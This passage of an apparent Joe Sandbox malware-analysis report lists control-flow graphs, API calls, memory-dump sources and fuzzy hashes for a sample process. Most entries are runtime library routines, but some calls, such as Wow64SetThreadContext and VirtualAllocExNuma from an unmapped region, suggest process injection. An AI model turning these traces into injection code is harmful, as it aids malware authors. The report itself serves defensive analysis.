326->315 330 240571-240575 329->330 331 240541-24056f call 2400da 329->331 333 240655-240671 call 241040 330->333 334 24057b-240589 330->334 331->329 341 240675-240696 Wow64SetThreadContext 333->341 342 240673 333->342 334->333 337 24058f-24059d 334->337 337->333 340 2405a3-2405c3 337->340 343 2405c6-2405ca 340->343 344 240698 341->344 345 24069a-2406a4 call 241141 341->345 342->285 343->333 346 2405d0-2405e5 343->346 344->285 352 2406a6 345->352 353 2406a8-2406ac 345->353 348 2405f7-2405fb 346->348 350 2405fd-240609 348->350 351 240638-240650 348->351 354 240636 350->354 355 24060b-240634 350->355 351->343 352->285 356 2406b4-2406b8 353->356 357 2406ae 353->357 354->348 355->354 359 2406c0-2406c4 356->359 360 2406ba 356->360 357->356 361 2406c6 359->361 362 2406cc-2406d0 359->362 360->359 361->362 363 2406d2-2406d7 call 2411f2 362->363 364 2406dc-2406e2 362->364 363->364 364->282 364->285
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411940280.0000000000240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_240000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: D
                                  • API String ID: 0-2746444292
                                  • Opcode ID: 953a10cdce4c6a83f1728cbf0a3f9d21a9bb17b9ca19b7032a897fe3a5ff0788
                                  • Instruction ID: f4550d8c2a56d8fe79cc87e60d80cd9244a13cb68f14ed4ae281cf18853558f1
                                  • Opcode Fuzzy Hash: 953a10cdce4c6a83f1728cbf0a3f9d21a9bb17b9ca19b7032a897fe3a5ff0788
                                  • Instruction Fuzzy Hash: 0102E370D20209EFDB18DF94C985BADBBB5BF04305F204069E615BA291D7B4AEA0DF14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 404 414428-41442f 405 414431-414439 call 4141a2 404->405 407 41443e-414443 405->407 408 414445-414454 407->408 409 41445a-41445f call 414464 407->409 408->405 410 414456-414458 408->410 412 414461-414463 409->412 410->412
                                  APIs
                                  • ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00414439
                                    • Part of subcall function 004141A2: try_get_function.LIBVCRUNTIME ref: 004141B7
                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0041445A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalInitializeSection___vcrt____vcrt_uninitialize_lockstry_get_function
                                  • String ID: `!D
                                  • API String ID: 2281893912-1253605976
                                  • Opcode ID: bf5090b05b53bf2620de1b88f0e275efcb8c49e0b65bdf8f539d136c4bb9f519
                                  • Instruction ID: 1e213cc090d7174af067c4877b04097e6a17ced4bf3fd0165bee738add91531c
                                  • Opcode Fuzzy Hash: bf5090b05b53bf2620de1b88f0e275efcb8c49e0b65bdf8f539d136c4bb9f519
                                  • Instruction Fuzzy Hash: DED05B73E0433011EC60161A6D0A7DB46155FD3F14FD60167FE1856293D54848C354EE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 414 406540-406551 415 406553-406559 414->415 416 4065b6-4065be 414->416 415->416 417 40655b-40656c call 40f5a8 415->417 420 406593 417->420 421 40656e-40657c call 408df0 call 403c80 417->421 423 40659a-4065a8 420->423 428 406581-406591 call 403a00 421->428 423->416 425 4065aa-4065b1 call 404680 423->425 425->416 428->423
                                  APIs
                                  • new.LIBCMT ref: 0040655D
                                  • std::locale::c_str.LIBCPMTD ref: 00406573
                                    • Part of subcall function 00403C80: std::_Lockit::_Lockit.LIBCPMT ref: 00403C8E
                                    • Part of subcall function 00403C80: _Yarn.LIBCPMTD ref: 00403C99
                                    • Part of subcall function 00403C80: _Yarn.LIBCPMTD ref: 00403CA4
                                    • Part of subcall function 00403C80: _Yarn.LIBCPMTD ref: 00403CAF
                                    • Part of subcall function 00403C80: _Yarn.LIBCPMTD ref: 00403CBA
                                    • Part of subcall function 00403C80: _Yarn.LIBCPMTD ref: 00403CC5
                                    • Part of subcall function 00403C80: _Yarn.LIBCPMTD ref: 00403CD0
                                    • Part of subcall function 00403C80: std::bad_exception::bad_exception.LIBCMTD ref: 00403CE3
                                    • Part of subcall function 00403C80: __CxxThrowException@8.LIBVCRUNTIME ref: 00403CF1
                                    • Part of subcall function 00403C80: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00403CFE
                                    • Part of subcall function 00403A00: std::bad_exception::bad_exception.LIBCMTD ref: 00403A0E
                                    • Part of subcall function 00403A00: ctype.LIBCPMTD ref: 00403A23
                                  • std::_Locinfo::~_Locinfo.LIBCPMTD ref: 004065B1
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Yarn$std::_$std::bad_exception::bad_exception$Exception@8LocinfoLocinfo::_Locinfo::~_Locinfo_ctorLockitLockit::_Throwctypestd::locale::c_str
                                  • String ID:
                                  • API String ID: 315514799-0
                                  • Opcode ID: 091e0fd82070fb040a71f3e1f02b09003b5c43ffb62dd9f79cd173250567ab93
                                  • Instruction ID: 0439a88d0379358cd32f1e14798d3cd70838f3a1781f2f9e136434e43e48c070
                                  • Opcode Fuzzy Hash: 091e0fd82070fb040a71f3e1f02b09003b5c43ffb62dd9f79cd173250567ab93
                                  • Instruction Fuzzy Hash: 2B0148B0900208FBDB14DFA4D94679EBB74AB00314F1081BAE8067B2D1DB395F55CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 431 41e49c-41e4bf call 41e1ea 434 41e4c1-41e4d4 431->434 435 41e4d6-41e4dc InitializeCriticalSectionAndSpinCount 431->435 436 41e4e2-41e4e4 434->436 435->436
                                  APIs
                                  • InitializeCriticalSectionAndSpinCount.KERNELBASE(00000FA0,-00000020,0041ECD0,-00000020,00000FA0,00000000,?,00000000,?), ref: 0041E4DC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CountCriticalInitializeSectionSpin
                                  • String ID: InitializeCriticalSectionEx
                                  • API String ID: 2593887523-3084827643
                                  • Opcode ID: 0ed38b6d3824a260bdf44b0f09568ceeca4002477d11bb4f653b2507e9e0fd91
                                  • Instruction ID: f9ae875e2d2830c4ac2b5eaa685c5e005b7963c553bdee66d684e632319edaa3
                                  • Opcode Fuzzy Hash: 0ed38b6d3824a260bdf44b0f09568ceeca4002477d11bb4f653b2507e9e0fd91
                                  • Instruction Fuzzy Hash: 25E09236680218B7CB211F52DC06EDE3F15EB54BA0F148422FD2915161C67E9962D6DC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 439 4140b7-4140cc call 413f96 441 4140d1-4140d8 439->441 442 4140e9-4140eb TlsAlloc 441->442 443 4140da-4140e8 call 40fd04 441->443
                                  APIs
                                  • try_get_function.LIBVCRUNTIME ref: 004140CC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: try_get_function
                                  • String ID: FlsAlloc
                                  • API String ID: 2742660187-671089009
                                  • Opcode ID: 5311fe89e5bbb6f8144d190ccd1a4ab2de52fc41652baaf0b571373ec61830c6
                                  • Instruction ID: de76b66b3c2e87d6f1debb8ca7eca6cab455fafc8a1351b817e72bbc951ca738
                                  • Opcode Fuzzy Hash: 5311fe89e5bbb6f8144d190ccd1a4ab2de52fc41652baaf0b571373ec61830c6
                                  • Instruction Fuzzy Hash: 64D02B31B813392BC22032C6AC02BEA7A548B04FBAF480073FF0C6128195AD155142DD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 447 4040f0-4040f9 call 40d42c 449 4040fe-40410d 447->449
                                  APIs
                                  • std::locale::_Init.LIBCPMT ref: 004040F9
                                    • Part of subcall function 0040D42C: __EH_prolog3.LIBCMT ref: 0040D433
                                    • Part of subcall function 0040D42C: std::_Lockit::_Lockit.LIBCPMT ref: 0040D43E
                                    • Part of subcall function 0040D42C: std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 0040D451
                                    • Part of subcall function 0040D42C: std::locale::_Setgloballocale.LIBCPMT ref: 0040D459
                                    • Part of subcall function 0040D42C: _Yarn.LIBCPMT ref: 0040D46F
                                    • Part of subcall function 0040D42C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040D4AD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::locale::_$Lockitstd::_$H_prolog3InitLocimpLocimp::_Lockit::_Lockit::~_New_SetgloballocaleYarn
                                  • String ID: <q@
                                  • API String ID: 2548088810-2462633153
                                  • Opcode ID: 75d434b3c55fb2c25767f950240ba9db5c06ba5084519fdac0ca74f972394e0b
                                  • Instruction ID: 806fb04aff4bdb560370039d43f85a2470f1566a298686006c663e36eafa8b0e
                                  • Opcode Fuzzy Hash: 75d434b3c55fb2c25767f950240ba9db5c06ba5084519fdac0ca74f972394e0b
                                  • Instruction Fuzzy Hash: D6D0C9B0D05208BBDB04DF95D94296DB7A8DB05304F1041ADE80C57341E572AE149696
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 450 425066-42508e call 424b9d 453 425253-425254 call 424c0e 450->453 454 425094-42509a 450->454 459 425259-42525b 453->459 455 42509d-4250a3 454->455 457 4250a9-4250b5 455->457 458 42519f-4251be call 4116a0 455->458 457->455 460 4250b7-4250bd 457->460 469 4251c1-4251c6 458->469 462 42525c-42526a call 40fcf3 459->462 463 4250c3-4250cf IsValidCodePage 460->463 464 425197-42519a 460->464 463->464 468 4250d5-4250dc 463->468 464->462 470 4250fe-42510b GetCPInfo 468->470 471 4250de-4250ea 468->471 472 425203-42520d 469->472 473 4251c8-4251cd 469->473 476 42518b-425191 470->476 477 42510d-42512c call 4116a0 470->477 475 4250ee-4250f9 471->475 472->469 474 42520f-425239 call 424b5f 472->474 478 425200 473->478 479 4251cf-4251d7 473->479 490 42523a-425249 474->490 481 42524b-42524c call 424c71 475->481 476->453 476->464 477->475 492 42512e-425135 477->492 478->472 483 4251f8-4251fe 479->483 484 4251d9-4251dc 479->484 491 425251 481->491 483->473 483->478 488 4251de-4251e4 484->488 488->483 489 4251e6-4251f6 488->489 489->483 489->488 490->481 490->490 491->459 493 425161-425164 492->493 494 425137-42513c 492->494 495 425169-425170 493->495 494->493 496 42513e-425146 494->496 495->495 497 425172-425186 call 424b5f 495->497 498 425148-42514f 496->498 499 425159-42515f 496->499 497->475 501 425150-425157 498->501 499->493 499->494 501->499 501->501
                                  APIs
                                    • Part of subcall function 00424B9D: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 00424BC8
                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00424EAD,?,00000000,?,00000000,?), ref: 004250C7
                                  • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00424EAD,?,00000000,?,00000000,?), ref: 00425103
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CodeInfoPageValid
                                  • String ID:
                                  • API String ID: 546120528-0
                                  • Opcode ID: 3e86b066bf4ed533688672433e0f4052ebc23263c0b00f9fad16c8bf572d133b
                                  • Instruction ID: b00e4121a54befbb84d2bda0f50c436582f98e79b51d3324210108404a90e8c0
                                  • Opcode Fuzzy Hash: 3e86b066bf4ed533688672433e0f4052ebc23263c0b00f9fad16c8bf572d133b
                                  • Instruction Fuzzy Hash: 9B511470F00A659FDB20CF36E8407BBBBE4EF91304F94446FD09687251D6799946CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 503 41e1ea-41e214 504 41e216-41e218 503->504 505 41e21a-41e21c 503->505 506 41e26b-41e26e 504->506 507 41e222-41e229 call 41e11f 505->507 508 41e21e-41e220 505->508 510 41e22e-41e232 507->510 508->506 511 41e251-41e268 510->511 512 41e234-41e242 GetProcAddress 510->512 514 41e26a 511->514 512->511 513 41e244-41e24f call 40f924 512->513 513->514 514->506
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f185d5f917ed3a6de2f73896cd4e0c3cf0b8691fee3d1d1c92107ee122e87bc
                                  • Instruction ID: c990e1af2b5516ed2a45469fe9b2d4450c615265179bf70ea3c1a226e9c0ca46
                                  • Opcode Fuzzy Hash: 6f185d5f917ed3a6de2f73896cd4e0c3cf0b8691fee3d1d1c92107ee122e87bc
                                  • Instruction Fuzzy Hash: 1601F53F200215AFDF128FAAED5099733A9FFC57207244136FE019B594DA36E8518B49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::ios_base::_Init.LIBCPMTD ref: 0040A5AA
                                    • Part of subcall function 004070B0: std::ios_base::clear.LIBCPMTD ref: 0040711C
                                    • Part of subcall function 004070B0: new.LIBCMT ref: 00407123
                                    • Part of subcall function 0040C450: ctype.LIBCPMTD ref: 0040C481
                                  • std::ios_base::_Addstd.LIBCPMT ref: 0040A5F3
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::ios_base::_$AddstdInitctypestd::ios_base::clear
                                  • String ID:
                                  • API String ID: 4021793725-0
                                  • Opcode ID: d5359b80accceb127700b317b594bf4fd35c3c318bb2b937e7c666cc98af3234
                                  • Instruction ID: 5d125a4c0f470632d68f33895832eca0ddbab717b6d1cc60d7a41c3cd710bd2a
                                  • Opcode Fuzzy Hash: d5359b80accceb127700b317b594bf4fd35c3c318bb2b937e7c666cc98af3234
                                  • Instruction Fuzzy Hash: F5F03170A04208EFDB04DF91C991BAEB771BB44304F2041ADE5052B3C2CB35AF50DB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004140B7: try_get_function.LIBVCRUNTIME ref: 004140CC
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00414387
                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00414392
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                  • String ID:
                                  • API String ID: 806969131-0
                                  • Opcode ID: 9da728a8ac5ba5f22fcb170992721884ad7613fcc42c43d22c8ebd5a4a0731e7
                                  • Instruction ID: 8a2e06084ac01e773ab60376658dff4023199fedf8c9d012dd1d8c1c09ee633e
                                  • Opcode Fuzzy Hash: 9da728a8ac5ba5f22fcb170992721884ad7613fcc42c43d22c8ebd5a4a0731e7
                                  • Instruction Fuzzy Hash: E0D0A93864430614AD1023F67802ACA228848F2BB9BB0079BF93086EC1EA7C80C2212F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetLastError.KERNEL32(?,?,00414CB6,00401405), ref: 0041D299
                                  • SetLastError.KERNEL32(00000000,00414CB6,00401405), ref: 0041D33B
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast
                                  • String ID:
                                  • API String ID: 1452528299-0
                                  • Opcode ID: e6d39e4b534a464421db0187c20716c7080e0e6dd5663b8d9adddf0a52a563fd
                                  • Instruction ID: 8b98d50797470afa0e04d388ae90ad5186526a42c812345aec62986ec25b2485
                                  • Opcode Fuzzy Hash: e6d39e4b534a464421db0187c20716c7080e0e6dd5663b8d9adddf0a52a563fd
                                  • Instruction Fuzzy Hash: 631129B9B052186EE2102B765DC6DEB26489B4536A7500137FD25C61E1D6BCCCC2416E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetCPInfo.KERNEL32(FFFFF9B5,?,00000005,00424EAD,?), ref: 00424CA3
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Info
                                  • String ID:
                                  • API String ID: 1807457897-0
                                  • Opcode ID: 6f795c6f76dd338988b836bd89f080f8d4c8bf7e4b157a4591a9253f110aa54b
                                  • Instruction ID: 8753b2c5cc76c907a0c7ac4c56318f0ba9ec433021d5659f198934512aa63ee3
                                  • Opcode Fuzzy Hash: 6f795c6f76dd338988b836bd89f080f8d4c8bf7e4b157a4591a9253f110aa54b
                                  • Instruction Fuzzy Hash: 51517DB16041689BDB118F29DD84BE6BBACFF96304F5401EAD449C7142C3795D45CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 004036C5
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                  • String ID:
                                  • API String ID: 3936482309-0
                                  • Opcode ID: b6c05efd78c7e5caa180ca250f1d203424b2bcc091f8b73780a1cfc2184ecb03
                                  • Instruction ID: 7902fc919d1c17492ab1cc7ffb4afcd0c8c32c32fc003c8b3472c96a61902ccf
                                  • Opcode Fuzzy Hash: b6c05efd78c7e5caa180ca250f1d203424b2bcc091f8b73780a1cfc2184ecb03
                                  • Instruction Fuzzy Hash: D411C978A14108EFCB08DF98C69099DBBF1FF89305F648299E9056B355C735AF01EB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,?,?,?,0041D2E2,00000001,00000364,?,00000005,000000FF,?,?,00414CB6,00401405), ref: 00417F71
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 722eeb20406246d4f45ed87f42e3520fa4df828a3c50a0ce097bf4999c6e137f
                                  • Instruction ID: 9aee0afedecdbada69a9e30f4908b58eed82883aaa5734ca2ecbae2eff1ca257
                                  • Opcode Fuzzy Hash: 722eeb20406246d4f45ed87f42e3520fa4df828a3c50a0ce097bf4999c6e137f
                                  • Instruction Fuzzy Hash: 36F0E93264D52567DB216B269C01BDB3768EF817A0B154127FC04962C0CE38DCC3C6ED
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 002407DA: GetSystemInfo.KERNELBASE(?), ref: 002407F7
                                  • VirtualAllocExNuma.KERNELBASE(00000000), ref: 0024089D
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411940280.0000000000240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_240000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocInfoNumaSystemVirtual
                                  • String ID:
                                  • API String ID: 449148690-0
                                  • Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                  • Instruction ID: a2dcb66f865b1de42624bc9250ef64b74825ab2ec442d39018592a2dd3ca09da
                                  • Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                  • Instruction Fuzzy Hash: D7F01870D64309BAEB187BF04D8B76D76789F00301F105565B740771C3DA7856A09EA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,00419465,?,?,?,00000003,00414846,?,004147B5,?,?,004149C4), ref: 0041911E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 5170a7218ec762228ecb3ddf93c5b79675e84a345c7e991e62c15e66292c1a64
                                  • Instruction ID: 099f54923895ef26ee8c0b5d8900e6df5326b259f005dc1aee25551aefbd1993
                                  • Opcode Fuzzy Hash: 5170a7218ec762228ecb3ddf93c5b79675e84a345c7e991e62c15e66292c1a64
                                  • Instruction Fuzzy Hash: 53E08C3220122676A62036265C196DB2648AB423F0F190127E80592281EA2C8CC141AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • new.LIBCMT ref: 00403734
                                    • Part of subcall function 004040F0: std::locale::_Init.LIBCPMT ref: 004040F9
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
